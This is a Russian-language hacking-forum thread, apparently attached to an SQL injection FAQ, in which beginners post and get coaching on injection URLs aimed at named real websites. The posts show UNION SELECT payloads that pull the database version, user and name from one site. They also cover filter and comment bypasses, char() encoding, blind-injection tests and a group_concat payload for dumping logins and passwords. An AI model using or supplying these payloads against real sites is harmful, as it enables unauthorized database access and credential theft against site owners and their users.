Авторские статьи SQL injection полный FAQ

Это конечно все правильно спорить не стану но вот для новичков никаких статей или FAQ по которых можно было осваивать на практике инъекции на современных ресурсах я найти не смог. Остается только разве что устанавливать "Denwer" и на localhost-те который ничего не фильтрует практиковать инъекции.

Ладно пойду погуглю часок другой может что-небудь и найду достаточно разжеванное для моего уровня познаний
P.S.: надеюсь я еще не надоел со своими философствованиями

 

https://forum.antichat.ru/threadedpost1814768.html#post1814768

Как бэ здесь около 11к постов с SQL Injection, бери любой да копай.
Мы сейчас общаемся в теме с отличным FAQ'ом по скулям.

 

ничего себе. еще никогда не видел чтоб на одну тему приходилось столько страниц. тут же месяцами читать не перечитать

 

Спасибо за ссылку на список форумов. Но я все же решил воспользоваться твоей добротой и задать несколько (скорее всего глупых) вопросов. Но сначала мои достижения:
На https://forum.antichat.ru/threadnav21336-1141-10.html в посте #11404 пишется об http://www.glassdecor.ru
http://www.glassdecor.ru/articles/show.php?id=11+order+by+2-- узнал что поля 2
http://www.glassdecor.ru/articles/show.php?id=-11+union+select+1,2-- узнал что выводится второе из них.
http://www.glassdecor.ru/articles/show.php?id=11+and+1=0+union+select+1,concat_ws(0x3a,version(),user(),database())-- узнал об версти- 5.0.67, имени пользователи [email protected] и имени БД - glassdecorru_db.
На сколько я понимаю функция concat_ws() используется для того чтобы объединить в виде одного параметра (не знаю как это точнее назвать) сразу три функции: version() , user(), database().
А теперь глупые вопросы:
1) http://www.glassdecor.ru/articles/show.php?id=-11+union+select+1,2+from+INFORMATION_SCHEMA.TABLES-- оказался алогичным к
http://www.glassdecor.ru/articles/show.php?id=-11+union+select+1,2-- INFORMATION_SCHEMA.TABLES появилась в 5-ой версии а у нас 5.0.67. значит она должна быть. Где я ступил?
2) http://www.glassdecor.ru/articles/show.php?id=-11+union+select+1,2/* почему-то приводит к ошибке. Значит ли это что «/» фильтруется? На сколько я понимаю нет. Потому что http://www.glassdecor.ru/articles/show.php?id=-11/**/union/**/+select/**/+1,2-- срабатывает как надо. А вот почему срабатывает комментарий «--», а при «/*» - ошибка я так и не понял?
3) Первый параметр concat_ws() – «0x3a» это имеется ввиду символ двоеточия «:» Но почему эго надо прописывать кодом а если просто прописать http://www.glassdecor.ru/articles/show.php?id=11+and+1=0+union+select+1,concat_ws,version(),user(),database())-- то приводит к ошибке. Значит ли это что символ двоеточия «:» фильтруется.
4) Что можно делать дальше если использование INFORMATION_SCHEMA.TABLES ни к чему полезному не приводит ?

P.S.: Что-то мои посты с каждым разом все длиннее и длиннее. Ctacok надеюсь я тебя ими еще не задолбал. Очень уж хочется освоить эту тему.

 

Сорри за нубский вопрос.когда я проверяю на уязвимости методом подставления кавычек и всего остального,выкидывает на главную.это как понимать?

 

Не факт, может и блайнд, который при ошибке запроса кидает на главную

 

спасибо,а если на подставление кавычки и также всего остального вообще ничего не выскакивает кавычка не фильруеццо типа %20 а просто страничка остается такая же то это блайнд?

 

А есть какой то фак по блайнду?

 

https://forum.antichat.net/showpost.php?p=407227&postcount=3

 

Зачарь без кавычек. (http://jdstiles.com/java/cct.html)
Например: ... WHERE table_name=char(84, 65, 66, 76, 69)/*

 

Вот несколько вопросов:
1. Вот есть сайт типа "бла-бла.ру/ид1", если я поставлю "ид1’ ", и выдаст ошибку, типа

, то что нужно делать дальше? подбирать количество строк? типа:

?, или количество полей? типа:

?
2. И еще, если есть готовая уязвимость например:

, что сделать дальше, чтобы попасть в бд?

 

2CyberHunter внимательно читай с первой страницы =\

 

Перечитал раза три...
Я просто не знаю языка sql =(.
Но прочитал статью и понял, что можно и без этого)).
Так может ответите? Не доходит и все =..(

 

Оператором order by ты находишь количество полей.
Union select 1,2...-ты определяешь принтабельное поле(т.е. то,через которое ты будешь выводить информацию)

 

Чатсный случай1
Хоть и баян, но

Code:

_http://www.laptopshowcase.co.uk/downloads.php?id=-1/*

Ошибка такого вида:

Code:

_http://www.laptopshowcase.co.uk/downloads.php?id=-1+group+by+1+union+select+1,2,version(),4,5,6,7,8,9,0,11/*

Терерь представляем себе что нет вывода ошибок!

 

Я правильно понимаю, что в данном случае ничего кроме глобальных переменных вроде USER достать нельзя? Т.е. вытащить что-то из базы не возможно?



P.S.
В статье опячатка:
(id*IF(ASCII(SUBSTRING(USER(),0,1))=113,1,-1))
должно быть
(id*IF(ASCII(SUBSTRING(USER(),1,1))=113,1,-1))

 

Можно всё, на что есть права.

 

Можно пример запроса с SELECT'ом?

 

пример с селектом тут - Тыц

З.Ы. Хватит засирать статьи!

 

Такое маленькое дополнение) group_concat имеет ограничение выводимости данных в 1024 + limit он не поддерживает, что бы обойти его нужно использовать mid

К примеру вот так:
587955+union+select+1,2,3,4,5,mid(group_concat(login,char(38),password),600,1024),7,8,9,10,11+from+База.Таблица--